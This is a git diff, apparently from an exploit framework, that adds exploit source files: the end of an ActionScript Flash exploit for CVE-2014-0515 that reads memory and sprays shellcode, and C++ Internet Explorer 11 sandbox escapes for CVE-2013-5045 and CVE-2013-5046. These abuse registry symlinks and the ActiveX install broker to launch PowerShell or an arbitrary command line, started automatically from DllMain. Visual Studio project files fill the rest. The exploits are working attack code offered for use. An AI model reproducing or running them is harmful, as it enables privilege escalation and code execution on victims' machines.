+			};
+			return (allocation_contents);
+		}
+		
+		// Returns pointer to the nops in one of the allocated code vectors
+		function findCodeVector(vector:*, vector_address:*, mark:*):uint{
+			var allocation_size:uint;
+			var allocation:uint = this.read_memory(vector, vector_address, ((vector_address & 0xFFFFF000) + 0x1c));
+			while (true)
+			{
+				allocation_size = this.read_memory(vector, vector_address, (allocation + 8));
+				if (allocation_size == 0x7f0) break; // Code Vector found
+				allocation = (allocation + 0x24); // next allocation
+			};
+			
+			// allocation contents should be the vector code, search for the mark 0x45454545 
+			var allocation_contents:uint = this.read_memory(vector, vector_address, (allocation + 0xc));
+			while (true)
+			{
+				if (this.read_memory(vector, vector_address, (allocation_contents + 0x28)) == mark) break;
+				allocation_contents = this.read_memory(vector, vector_address, (allocation_contents + 8)); // next allocation
+			};
+			return ((allocation_contents + 0x2c));
+		}
+				
+		// create 8 vectors of size 0x7f0 inside an array to place shellcode 
+		function createCodeVectors(mark:uint, nops:uint){
+			var code_vectors_array:Array = new Array();
+			var i:* = 0;
+			while (i < 8)
+			{
+				code_vectors_array[i] = new Vector.<uint>(((0x7f0 / 4) - 8)); // new Vector.<uint>(0x1f4)
+				code_vectors_array[i][0] = mark; // 0x45454545 // inc ebp * 4
+				code_vectors_array[i][1] = nops; // 0x90909090 // nop * 4
+				i++;
+			};
+			return (code_vectors_array);
+		}
+		
+		
+		// Fill with the code vectors with the shellcode
+		function fillCodeVectors(array_code_vectors:Array) {
+			var i:uint = 0;
+			var sh:uint=1;
+			
+			while(i < array_code_vectors.length)
+			{	
+				for(var u:String in shellcodeObj)
+				{
+					array_code_vectors[i][sh++] = Number(shellcodeObj[u]); 
+				}
+				i++;
+				sh = 1;
+			}
+		}		
+	}
+}//package 
diff --git a/external/source/exploits/CVE-2014-0515/Graph_Shad.as b/external/source/exploits/CVE-2014-0515/Graph_Shad.as
new file mode 100755
index 0000000000..c0e84dff5d
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0515/Graph_Shad.as
@@ -0,0 +1,10 @@
+package
+{
+	import mx.core.ByteArrayAsset;
+	
+	[Embed(source="binary_data", mimeType="application/octet-stream")]
+	public class Graph_Shad extends ByteArrayAsset
+	{
+
+	}
+}
\ No newline at end of file
diff --git a/external/source/exploits/CVE-2014-0515/binary_data b/external/source/exploits/CVE-2014-0515/binary_data
new file mode 100755
index 0000000000..8d83cb55c9
Binary files /dev/null and b/external/source/exploits/CVE-2014-0515/binary_data differ
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.cpp
new file mode 100755
index 0000000000..162568212e
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.cpp
@@ -0,0 +1,184 @@
+// This file is part of IE11SandboxEsacapes.
+
+// IE11SandboxEscapes is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+
+// IE11SandboxEscapes is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+
+// You should have received a copy of the GNU General Public License
+// along with IE11SandboxEscapes.  If not, see <http://www.gnu.org/licenses/>.
+
+#include "stdafx.h"
+#include <winternl.h>
+#include <IEPMapi.h>
+
+#define MAX_ENV 32767
+
+#pragma comment(lib, "Iepmapi.lib")
+
+typedef NTSTATUS (__stdcall *fNtOpenSection)(
+	_Out_  PHANDLE SectionHandle,
+	_In_   ACCESS_MASK DesiredAccess,
+	_In_   POBJECT_ATTRIBUTES ObjectAttributes
+	);
+
+HANDLE MyCreateProcess(bstr_t exec, bstr_t cmdline)
+{
+	STARTUPINFO startInfo = { 0 };
+	PROCESS_INFORMATION procInfo = { 0 };	
+
+	if (!CreateProcess(exec, cmdline, NULL, NULL, FALSE, 0, NULL, NULL,
+		&startInfo, &procInfo))
+	{
+		DebugPrintf("Error Creating Process: %d", GetLastError());
+
+		return nullptr;
+	}
+	else
+	{
+		CloseHandle(procInfo.hThread);
+
+		return procInfo.hProcess;
+	}
+}
+
+bstr_t GetExploitUrl(LPWSTR env)
+{
+	WCHAR buf[MAX_ENV];
+
+	GetEnvironmentVariable(env, buf, MAX_ENV);
+
+	return buf;
+}
+
+void CreateIEProcess()
+{
+	HANDLE hProcess = MyCreateProcess(GetExecutableFileName(nullptr), L"iexplore.exe " + GetExploitUrl(L"HTML_URL"));
+
+	if (hProcess)
+	{
+		WaitForSingleObject(hProcess, 1000);
+		CloseHandle(hProcess);
+	}
+}
+
+void CreateUserKey(LPCWSTR path)
+{
+	STARTUPINFO startInfo = { 0 };
+	PROCESS_INFORMATION procInfo = { 0 };
+	bstr_t sid = GetUserSid();
+
+	bstr_t linkName = L"\\Registry\\User\\" + sid + L"\\Software\\Microsoft\\Internet Explorer\\LowRegistry\\DontShowMeThisDialogAgain";
+
+	LONG res = RegDeleteKey(HKEY_CURRENT_USER, L"Software\\Microsoft\\Internet Explorer\\LowRegistry\\DontShowMeThisDialogAgain");
+
+	DebugPrintf("Delete: %d", res);
+
+	bstr_t destName = L"\\Registry\\User\\" + sid + path;
+
+	CreateLink(linkName, destName, 0);
+
+	CreateIEProcess();
+
+	DeleteLink(linkName);
+}
+
+void DoRegistrySymlink()
+{
+	STARTUPINFO startInfo = { 0 };
+	PROCESS_INFORMATION procInfo = { 0 };
+	HKEY hKey = nullptr;	
+	HANDLE hSection = nullptr;
+	bstr_t sid = GetUserSid();
+	bool success = false;	
+
+	try
+	{
+		CreateUserKey(L"\\Software\\Microsoft\\Internet Explorer\\Low Rights");
+		CreateUserKey(L"\\Software\\Microsoft\\Internet Explorer\\Low Rights\\ElevationPolicy");
+		CreateUserKey(L"\\Software\\Microsoft\\Internet Explorer\\Low Rights\\ElevationPolicy\\{C2B9F6A6-6E3C-4954-8A73-69038A049D00}");
+
+		LONG res = RegOpenKeyEx(HKEY_CURRENT_USER, L"Software\\Microsoft\\Internet Explorer\\Low Rights\\ElevationPolicy\\{C2B9F6A6-6E3C-4954-8A73-69038A049D00}",
+			0, KEY_ALL_ACCESS | KEY_WOW64_64KEY, &hKey);
+
+		if (res != 0)
+		{
+			DebugPrintf("Open Class Key Failed %d", res);
+			throw 0;
+		}
+
+		CreateRegistryValueString(hKey, L"AppName", L"powershell.exe");
+		CreateRegistryValueString(hKey, L"AppPath", GetWindowsSystemDirectory() + L"\\WindowsPowerShell\\v1.0");
+		CreateRegistryValueDword(hKey, L"Policy", 3);
+
+		bstr_t name = GetSessionPath() + L"\\BaseNamedObjects\\LRIEElevationPolicy_";
+
+		UNICODE_STRING objName = { 0 };
+		objName.Buffer = name;
+		objName.Length = SysStringByteLen(name);
+		objName.MaximumLength = SysStringByteLen(name);
+
+		OBJECT_ATTRIBUTES objAttr = { 0 };
+
+		InitializeObjectAttributes(&objAttr, &objName, OBJ_CASE_INSENSITIVE, 0, 0);
+
+		fNtOpenSection pfNtOpenSection = (fNtOpenSection)GetProcAddress(GetModuleHandle(L"ntdll"), "NtOpenSection");
+	
+		NTSTATUS status = pfNtOpenSection(&hSection, SECTION_MAP_READ | SECTION_MAP_WRITE, &objAttr);
+
+		if (status != 0)
+		{
+			DebugPrintf("Error opening section: %08X\n", status);
+			throw 0;
+		}
+
+		unsigned int* p = (unsigned int*)MapViewOfFile(hSection, FILE_MAP_READ | FILE_MAP_WRITE, 0, 0, sizeof(unsigned int));
+
+		if (p == nullptr)
+		{
+			DebugPrintf("Error mapping section %d\n", GetLastError());
+			throw 0;
+		}
+
+		DebugPrintf("Current Counter: %d\n", *p);
+
+		// Increment
+		*p = *p + 1;
+
+		DebugPrintf("New Counter: %d\n", *p);
+
+		UnmapViewOfFile(p);
+		CloseHandle(hSection);
+		hSection = nullptr;
+
+		MyCreateProcess(GetWindowsSystemDirectory() + L"\\WindowsPowerShell\\v1.0\\powershell.exe", L"powershell.exe " + GetExploitUrl(L"PSH_CMD"));
+	}
+	catch (...)
+	{
+	}
+
+	if (hSection)
+	{
+		CloseHandle(hSection);
+	}
+	
+	if (hKey)
+	{
+		RegCloseKey(hKey);
+	}
+
+}
+
+DWORD CALLBACK ExploitThread(LPVOID hModule)
+{
+	CoInitialize(nullptr);	
+	DoRegistrySymlink();
+	CoUninitialize();
+
+	FreeLibraryAndExitThread((HMODULE)hModule, 0);
+}
\ No newline at end of file
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.vcxproj b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.vcxproj
new file mode 100755
index 0000000000..285b19b27e
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.vcxproj
@@ -0,0 +1,188 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{A31EEDC1-5B69-42E9-BAE4-717DA6AF9E52}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>CVE20140268</RootNamespace>
+    <ProjectName>CVE-2013-5045</ProjectName>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <PropertyGroup Label="UserMacros" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <LinkIncremental>true</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <LinkIncremental>false</LinkIncremental>
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <ModuleDefinitionFile>CVE-2014-0268.def</ModuleDefinitionFile>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <ClCompile>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <ModuleDefinitionFile>CVE-2014-0268.def</ModuleDefinitionFile>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <ModuleDefinitionFile>
+      </ModuleDefinitionFile>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <ClCompile>
+      <WarningLevel>Level3</WarningLevel>
+      <PrecompiledHeader>Use</PrecompiledHeader>
+      <Optimization>MaxSpeed</Optimization>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <IntrinsicFunctions>true</IntrinsicFunctions>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <SDLCheck>true</SDLCheck>
+      <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+    </ClCompile>
+    <Link>
+      <SubSystem>Windows</SubSystem>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <EnableCOMDATFolding>true</EnableCOMDATFolding>
+      <OptimizeReferences>true</OptimizeReferences>
+      <ModuleDefinitionFile>CVE-2014-0268.def</ModuleDefinitionFile>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClInclude Include="stdafx.h" />
+    <ClInclude Include="targetver.h" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="CVE-2013-5045.cpp" />
+    <ClCompile Include="dllmain.cpp">
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+      </PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+      </PrecompiledHeader>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
+      <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+      </PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+      </PrecompiledHeader>
+    </ClCompile>
+    <ClCompile Include="stdafx.cpp">
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
+      <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <ProjectReference Include="..\CommonUtils\CommonUtils.vcxproj">
+      <Project>{04dde547-bb65-4c0c-b80b-231df42c7a1d}</Project>
+    </ProjectReference>
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
\ No newline at end of file
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/dllmain.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/dllmain.cpp
new file mode 100755
index 0000000000..042cf2c7c4
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/dllmain.cpp
@@ -0,0 +1,23 @@
+// dllmain.cpp : Defines the entry point for the DLL application.
+#include "stdafx.h"
+
+DWORD CALLBACK ExploitThread(LPVOID hModule);
+
+BOOL APIENTRY DllMain( HMODULE hModule,
+                       DWORD  ul_reason_for_call,
+                       LPVOID lpReserved
+					 )
+{
+	switch (ul_reason_for_call)
+	{
+	case DLL_PROCESS_ATTACH:
+		CreateThread(nullptr, 0, ExploitThread, hModule, 0, 0);
+		break;
+	case DLL_THREAD_ATTACH:
+	case DLL_THREAD_DETACH:
+	case DLL_PROCESS_DETACH:
+		break;
+	}
+	return TRUE;
+}
+
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/stdafx.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/stdafx.cpp
new file mode 100755
index 0000000000..11763c77a3
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/stdafx.cpp
@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// CVE-2014-0268.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/stdafx.h b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/stdafx.h
new file mode 100755
index 0000000000..562cb0adb0
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/stdafx.h
@@ -0,0 +1,11 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#include <windows.h>
+#include <Utils.h>
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/targetver.h b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/targetver.h
new file mode 100755
index 0000000000..87c0086de7
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/targetver.h
@@ -0,0 +1,8 @@
+#pragma once
+
+// Including SDKDDKVer.h defines the highest available Windows platform.
+
+// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
+// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
+
+#include <SDKDDKVer.h>
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.cpp
new file mode 100755
index 0000000000..4a6fab2bff
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.cpp
@@ -0,0 +1,127 @@
+// This file is part of IE11SandboxEsacapes.
+
+// IE11SandboxEscapes is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+
+// IE11SandboxEscapes is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+
+// You should have received a copy of the GNU General Public License
+// along with IE11SandboxEscapes.  If not, see <http://www.gnu.org/licenses/>.
+
+#include "stdafx.h"
+#include <Utils.h>
+#include <Shlwapi.h>
+
+#pragma comment(lib, "shlwapi.lib")
+
+typedef HRESULT(__stdcall *fCoCreateUserBroker)(IIEUserBroker** ppBroker);
+
+void DoAXExploit()
+{
+	try
+	{
+		HRESULT ret = E_FAIL;
+
+		IIEUserBrokerPtr broker = CreateBroker();
+
+		DebugPrintf("Created User Broker: %p\n", broker);
+
+		IIEAxInstallBrokerBrokerPtr axInstallBroker = broker;
+
+		DebugPrintf("Created AX Install Broker: %p\n", axInstallBroker);
+
+		IUnknownPtr unk;
+
+		ret = axInstallBroker->BrokerGetAxInstallBroker(__uuidof(CIEAxInstallBroker), IID_IUnknown, 0, 2, nullptr, &unk);
+		if (FAILED(ret))
+		{
+			DebugPrintf("Failed to create install broker\n");
+			throw _com_error(ret);
+		}
+
+		IIeAxiAdminInstallerPtr admin = unk;
+				
+		bstr_t sessionGuid;
+		bstr_t empty;
+
+		ret = admin->InitializeAdminInstaller(empty, empty, sessionGuid.GetAddress());
+		if (FAILED(ret))
+		{
+			DebugPrintf("Failed initialize admin interface\n");
+			throw _com_error(ret);
+		}
+			
+		DebugPrintf("Initialize: %ls\n", sessionGuid.GetBSTR());
+
+		IIeAxiInstaller2Ptr installer = unk;
+
+		DebugPrintf("Installer: %p", installer);
+
+		unsigned char* details = nullptr;
+		unsigned int detailsLength = 0;
+
+		CLSID mgrclsid;
+
+		// Not important really
+		CLSIDFromString(L"4871A87A-BFDD-4106-8153-FFDE2BAC2967", &mgrclsid);
+
+		/*bstr_t url = L"http://dlm.tools.akamai.com/dlmanager/versions/activex/dlm-activex-2.2.4.8.cab#Version=2,2,4,8";
+		bstr_t path = L"C:\\users\\user\\desktop\\dlm-activex-2.2.4.8.cab";*/
+
+		bstr_t path = GetWindowsSystemDirectory() + L"\\notepad.exe";
+
+		bstr_t fullPath;			
+
+		// Verify a local "signed" file, doesn't really matter what, we are not going to run it
+		ret = installer->VerifyFile(sessionGuid, nullptr, path, path, bstr_t(L""),
+			0, 0, mgrclsid, fullPath.GetAddress(), &detailsLength, &details);
+
+		if (FAILED(ret))
+		{
+			throw _com_error(ret);
+		}
+
+		WCHAR newPath[MAX_PATH];
+
+		wcscpy_s(newPath, fullPath);
+
+		PathRemoveFileSpec(newPath);
+
+		// Install file to dummy location, use canonicalization trick to escape quotes later
+		ret = installer->InstallFile(sessionGuid, nullptr, bstr_t(newPath), bstr_t(PathFindFileName(fullPath)),
+			GetWindowsSystemDirectory() + L"\\calc.exe\" \\..\\..\\..\\..\\..\\..\\windows\\temp", bstr_t(L"testbin.exe"), 0);
+		DebugPrintf("InstallFile: %08X\n", ret);
+
+		if (FAILED(ret))
+		{
+			throw _com_error(ret);
+		}
+
+		bstr_t installPath = GetWindowsSystemDirectory() + L"\\calc.exe\" \\..\\..\\..\\..\\..\\..\\windows\\temp\\testbin.exe";
+
+		PROCESS_INFORMATION procInfo = { 0 };
+
+		// Run our arbitrary command line
+		ret = installer->RegisterExeFile(sessionGuid, installPath, 0, &procInfo);
+	}
+	catch (_com_error e)
+	{
+		DebugPrintf("Error: %ls\n", e.ErrorMessage());
+	}	
+}
+
+DWORD CALLBACK ExploitThread(LPVOID hModule)
+{
+	CoInitialize(NULL);
+
+	DoAXExploit();
+
+	CoUninitialize();
+
+	FreeLibraryAndExitThread((HMODULE)hModule, 0);	
+}
\ No newline at end of file
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.vcxproj b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.vcxproj
new file mode 100755
index 0000000000..bde9556738
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/CVE-2013-5046.vcxproj
@@ -0,0 +1,182 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup Label="ProjectConfigurations">
+    <ProjectConfiguration Include="Debug|Win32">
+      <Configuration>Debug</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Debug|x64">
+      <Configuration>Debug</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|Win32">
+      <Configuration>Release</Configuration>
+      <Platform>Win32</Platform>
+    </ProjectConfiguration>
+    <ProjectConfiguration Include="Release|x64">
+      <Configuration>Release</Configuration>
+      <Platform>x64</Platform>
+    </ProjectConfiguration>
+  </ItemGroup>
+  <PropertyGroup Label="Globals">
+    <ProjectGuid>{7A9AC14A-00BC-4A69-9B86-C80635606FEA}</ProjectGuid>
+    <Keyword>Win32Proj</Keyword>
+    <RootNamespace>CVE20140268</RootNamespace>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>true</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
+    <ConfigurationType>DynamicLibrary</ConfigurationType>
+    <UseDebugLibraries>false</UseDebugLibraries>
+    <PlatformToolset>v120</PlatformToolset>
+    <WholeProgramOptimization>true</WholeProgramOptimization>
+    <CharacterSet>Unicode</CharacterSet>
+  </PropertyGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
+  <ImportGroup Label="ExtensionSettings">
+  </ImportGroup>
+  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
+  </ImportGroup>
+  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
